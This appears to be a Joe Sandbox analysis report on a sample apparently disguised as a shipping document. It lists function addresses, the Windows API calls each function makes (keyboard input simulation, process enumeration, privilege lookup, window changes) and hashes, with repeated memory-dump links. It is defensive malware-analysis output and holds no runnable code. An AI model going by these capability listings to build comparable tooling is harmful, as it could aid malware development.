Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 965f60ce8bd6b0b8c8b573c25a385db7ebd0a5ea563d7f2029278175a8beb585
Instruction ID: b06de9aebdc0868029414f420cff20a17e97f971c492c52dab41fa1396acc358
Opcode Fuzzy Hash: 965f60ce8bd6b0b8c8b573c25a385db7ebd0a5ea563d7f2029278175a8beb585
Instruction Fuzzy Hash: 7E412B3A604A10DFCF11DF15C544A5EBBE2AF89320B59C488E94AAB362CB70FD41DF91

Function 000CD8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,000B6D71,00000000,00000000,000B82D9,?,000B82D9,?,00000001,000B6D71,8BE85006,00000001,000B82D9,000B82D9), ref: 000CD910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 000CD999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 000CD9AB
__freea.LIBCMT ref: 000CD9B4

Part of subcall function 000C3820: RtlAllocateHeap.NTDLL(00000000,?,00161444,?,000AFDF5,?,?,0009A976,00000010,00161440,000913FC,?,000913C6,?,00091129), ref: 000C3852

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 0f67eda2ec011a34957b68148bac11acaf31673e5eedbac359bf8f6322e6124d
Instruction ID: 2bbde1a3658f5a916e0c10d23d00ef0added5810cf1dce365d365d01624432d2
Opcode Fuzzy Hash: 0f67eda2ec011a34957b68148bac11acaf31673e5eedbac359bf8f6322e6124d
Instruction Fuzzy Hash: 7731AD72A1020AABDB25DF64DC81EEF7BA5EB41710B05426EFC04D6291EB35CD55CBA0

Function 001252C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 00125352
GetWindowLongW.USER32(?,000000F0), ref: 00125375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00125382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001253A8

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: 268d984706394f03af7aca4bc2a6d0a16a6936a2be6f3675906075a9bbbe96ab
Instruction ID: 8e3f10ece4775297e303ad620bf9f2a4a38913d539825f74e6d8e8c453a90f95
Opcode Fuzzy Hash: 268d984706394f03af7aca4bc2a6d0a16a6936a2be6f3675906075a9bbbe96ab
Instruction Fuzzy Hash: DE31C234A55A28FFEB34DA14EC86BE83767BB053D0F586101FA11962E1C7B09DA0DB81

Function 000FAB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 000FABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 000FAC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 000FAC74
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 000FACC6

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: d27b7490ee1cb0b8e93288dc0b765984e97ab97cf357f9a704fe871706e86cca
Instruction ID: bcf0342c27e298cf723ae191ae21d749fd723076f0e08aa01fdba0a100fd35c3
Opcode Fuzzy Hash: d27b7490ee1cb0b8e93288dc0b765984e97ab97cf357f9a704fe871706e86cca
Instruction Fuzzy Hash: 383108B0B0071C6FEF35CB658C147FE7BF5AB4A310F04421AE68952AD1C3758995A7D2

Function 00127674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0012769A
GetWindowRect.USER32(?,?), ref: 00127710
PtInRect.USER32(?,?,00128B89), ref: 00127720
MessageBeep.USER32(00000000), ref: 0012778C

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: e6a0b237c8cd860a2b41743d7327b03a1e1e601b5f0c48d4ee12edd2fa303ee6
Instruction ID: a9d4165d817d58307bd569e459467dbeeed12734cb57acfa3cf4a9d55b82d9e9
Opcode Fuzzy Hash: e6a0b237c8cd860a2b41743d7327b03a1e1e601b5f0c48d4ee12edd2fa303ee6
Instruction Fuzzy Hash: F741C034605265EFCB11CF58E898EAA77F4FF48304F1941A8E914DB2A1C370E992CF90

Function 001216DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 001216EB

Part of subcall function 000F3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 000F3A57
Part of subcall function 000F3A3D: GetCurrentThreadId.KERNEL32 ref: 000F3A5E
Part of subcall function 000F3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,000F25B3), ref: 000F3A65

GetCaretPos.USER32(?), ref: 001216FF
ClientToScreen.USER32(00000000,?), ref: 0012174C
GetForegroundWindow.USER32 ref: 00121752

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 18e0d5762042027dee02a3de1fa503adc3a6a5d9683f15d896be4ee60509d920
Instruction ID: cab981279ffe90e6bb9d5e19bf2838e6419d0fee41212b24c6473123485cba39
Opcode Fuzzy Hash: 18e0d5762042027dee02a3de1fa503adc3a6a5d9683f15d896be4ee60509d920
Instruction Fuzzy Hash: F7315272D00149AFDB10EFAAC881CEEB7F9EF98304B508069E515E7612E731DE45CBA1

Function 000FD4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 000FD501
Process32FirstW.KERNEL32(00000000,?), ref: 000FD50F
Process32NextW.KERNEL32(00000000,?), ref: 000FD52F
CloseHandle.KERNEL32(00000000), ref: 000FD5DC

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: b1d9806794baddc2ed7312447b74ac4cec1957a871bceeeb63eada86414d558b
Instruction ID: c133eab4c019f5deb6940776979bc4fa54a3cea106fb1499ec10eb2297065758
Opcode Fuzzy Hash: b1d9806794baddc2ed7312447b74ac4cec1957a871bceeeb63eada86414d558b
Instruction Fuzzy Hash: 5831C271108304AFD710EF64C881ABFBBF9EF99354F10092DF681821A2EB719949DB92

Function 00128FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000A9BB2

GetCursorPos.USER32(?), ref: 00129001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,000E7711,?,?,?,?,?), ref: 00129016
GetCursorPos.USER32(?), ref: 0012905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,000E7711,?,?,?), ref: 00129094

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: dc019fae272fbc2397bac4948ae9e8837ea90126302bf7e3ffacc7a23e6975db
Instruction ID: 41a63346b400a9f7a8eed84782de80a611802ddffd6d1df1bfd200ea263ea402
Opcode Fuzzy Hash: dc019fae272fbc2397bac4948ae9e8837ea90126302bf7e3ffacc7a23e6975db
Instruction Fuzzy Hash: C121AE35600028FFDB258F98DC58EFA7BB9FF8A350F044169F9058B261C37599A1DBA0

Function 000FD2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0012CB68), ref: 000FD2FB
GetLastError.KERNEL32 ref: 000FD30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 000FD319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0012CB68), ref: 000FD376

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 6d0271e048f70105b7bebdc02a22bd8e354b341eb8473498b8e986e705c70606
Instruction ID: 5628965b16595f8ab31bde5276b2e5cb02d1ec3e49d553ca7c431c202648b033
Opcode Fuzzy Hash: 6d0271e048f70105b7bebdc02a22bd8e354b341eb8473498b8e986e705c70606
Instruction Fuzzy Hash: 9A21D3705082059F8710DF28C8818BE77E5EF55364F104A1EF699C32A2DB30DA46EB93

Function 000F1571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000F1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 000F102A
Part of subcall function 000F1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 000F1036
Part of subcall function 000F1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 000F1045
Part of subcall function 000F1014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 000F104C
Part of subcall function 000F1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 000F1062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 000F15BE
_memcmp.LIBVCRUNTIME ref: 000F15E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 000F1617
HeapFree.KERNEL32(00000000), ref: 000F161E

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 910b1be4f3fcaea2efbadf02721f81bb4112e1bd6d61089888a5c942de47560c
Instruction ID: a1ed43eb136fa675f9d774de370a6d742d9184a5d3819a1074f0d71b3dc3c76f
Opcode Fuzzy Hash: 910b1be4f3fcaea2efbadf02721f81bb4112e1bd6d61089888a5c942de47560c
Instruction Fuzzy Hash: 32215531E00108EBDB14DFA4C949BEEB7F8EF84744F084459E641AB641E771AA45EBA0

Function 00122782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 0012280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00122824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00122832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00122840

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: dcf01fa654b77e9cb9d93adb8490be4833ff7fa17ef01c278bb0a67ae04f5b23
Instruction ID: b56eb253e6b0033c3168fa80990a1b5313f119fb4a85a8c700ab8712550ed86c
Opcode Fuzzy Hash: dcf01fa654b77e9cb9d93adb8490be4833ff7fa17ef01c278bb0a67ae04f5b23
Instruction Fuzzy Hash: 1E21E031208520BFD7149B24D844FAE7B95AF55324F148258F4268BAA2CB71EC92CBD0

Function 000F78F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000F8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,000F790A,?,000000FF,?,000F8754,00000000,?,0000001C,?,?), ref: 000F8D8C
Part of subcall function 000F8D7D: lstrcpyW.KERNEL32(00000000,?,?,000F790A,?,000000FF,?,000F8754,00000000,?,0000001C,?,?,00000000), ref: 000F8DB2
Part of subcall function 000F8D7D: lstrcmpiW.KERNEL32(00000000,?,000F790A,?,000000FF,?,000F8754,00000000,?,0000001C,?,?), ref: 000F8DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,000F8754,00000000,?,0000001C,?,?,00000000), ref: 000F7923
lstrcpyW.KERNEL32(00000000,?,?,000F8754,00000000,?,0000001C,?,?,00000000), ref: 000F7949
lstrcmpiW.KERNEL32(00000002,cdecl,?,000F8754,00000000,?,0000001C,?,?,00000000), ref: 000F7984

Strings

cdecl, xrefs: 000F797B

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 3b1b1031944e34ad81dfde38138a4417c646233ef25001a04e918891c60a5c00
Instruction ID: 39ea7ca46f9c13a657909956a5b880e735e551214330a57cba4fdee69511abbd
Opcode Fuzzy Hash: 3b1b1031944e34ad81dfde38138a4417c646233ef25001a04e918891c60a5c00
Instruction Fuzzy Hash: D311293A204306ABDB259F34CC45DBE77E5FF45350B40402AFA06C76A5EF719811D792

Function 00127CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00127D0B
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00127D2A
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00127D42
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0010B7AD,00000000), ref: 00127D6B

Part of subcall function 000A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000A9BB2

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: 36e20816feb22fab825260bcec16785306c87c3d5328c5e9b5b2842fec5e626a
Instruction ID: ad83e6b7b671569fa59f3f1e855ae970db683792c86b0f4f73b370e72450c0f2
Opcode Fuzzy Hash: 36e20816feb22fab825260bcec16785306c87c3d5328c5e9b5b2842fec5e626a
Instruction Fuzzy Hash: 3611AF31605669AFCB149F68EC04AAB3BA5AF45360B154728F939D72F0E73099B1CB90

Function 00125660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 001256BB
_wcslen.LIBCMT ref: 001256CD
_wcslen.LIBCMT ref: 001256D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 00125816

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: 691733b78424ef4015a1842d82b637ba568d81e1b24ca9acb340a2ff46111903
Instruction ID: 585fcf730dcafca71a38be7ed7da972285fa99ff205c476e7a377235820b1cce
Opcode Fuzzy Hash: 691733b78424ef4015a1842d82b637ba568d81e1b24ca9acb340a2ff46111903
Instruction Fuzzy Hash: 4F110871A00628A6DF20EF65ECC5AFE77BDEF10764F504026F915D6182E770CAA0CB60

Function 000C1D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cec9d5838876c414f13308e53b28fd745421a5123d4105f064970297f2c74f47
Instruction ID: 6c6857060e2ca7e11d317049f7a21f2350958dafb9cd20678de7ce0d76089b1e
Opcode Fuzzy Hash: cec9d5838876c414f13308e53b28fd745421a5123d4105f064970297f2c74f47
Instruction Fuzzy Hash: 210162B2205A167EF66117787CC1FAF669DDF423B8B35032DF522511D7DB708C5051A0

Function 000F1A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 000F1A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 000F1A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 000F1A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 000F1A8A

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 33fda1b57745d4b520067054133c99f4d4ca5de03df48db92ee2c8206aa6c01d
Instruction ID: 510dac901c79ddefa9de43f7a4a9e7b6531234bb71c4dea4fabdfaf0d261aae9
Opcode Fuzzy Hash: 33fda1b57745d4b520067054133c99f4d4ca5de03df48db92ee2c8206aa6c01d
Instruction Fuzzy Hash: B511093AD01219FFEB11DBA5CD85FEDBBB8EB08750F200091EA04B7290D6716E51EB94

Function 000FE1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000FE1FD
MessageBoxW.USER32(?,?,?,?), ref: 000FE230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 000FE246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 000FE24D

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 0888c464601bf823d65aeefcfb5af3c84d9d8d2caef36aa163ff1a3e9d3851b7
Instruction ID: 358878f1f18c8e4e762d87baccc1c5a318fa612b51fb63dd52a3c8e5f8d0e304
Opcode Fuzzy Hash: 0888c464601bf823d65aeefcfb5af3c84d9d8d2caef36aa163ff1a3e9d3851b7
Instruction Fuzzy Hash: AB112B76904258BFD7119FA8DC05AAF7FADBB45320F144615FA15D3B91E2B0CD5087A0

Function 000BD1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,000BCFF9,00000000,00000004,00000000), ref: 000BD218
GetLastError.KERNEL32 ref: 000BD224
__dosmaperr.LIBCMT ref: 000BD22B
ResumeThread.KERNEL32(00000000), ref: 000BD249

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

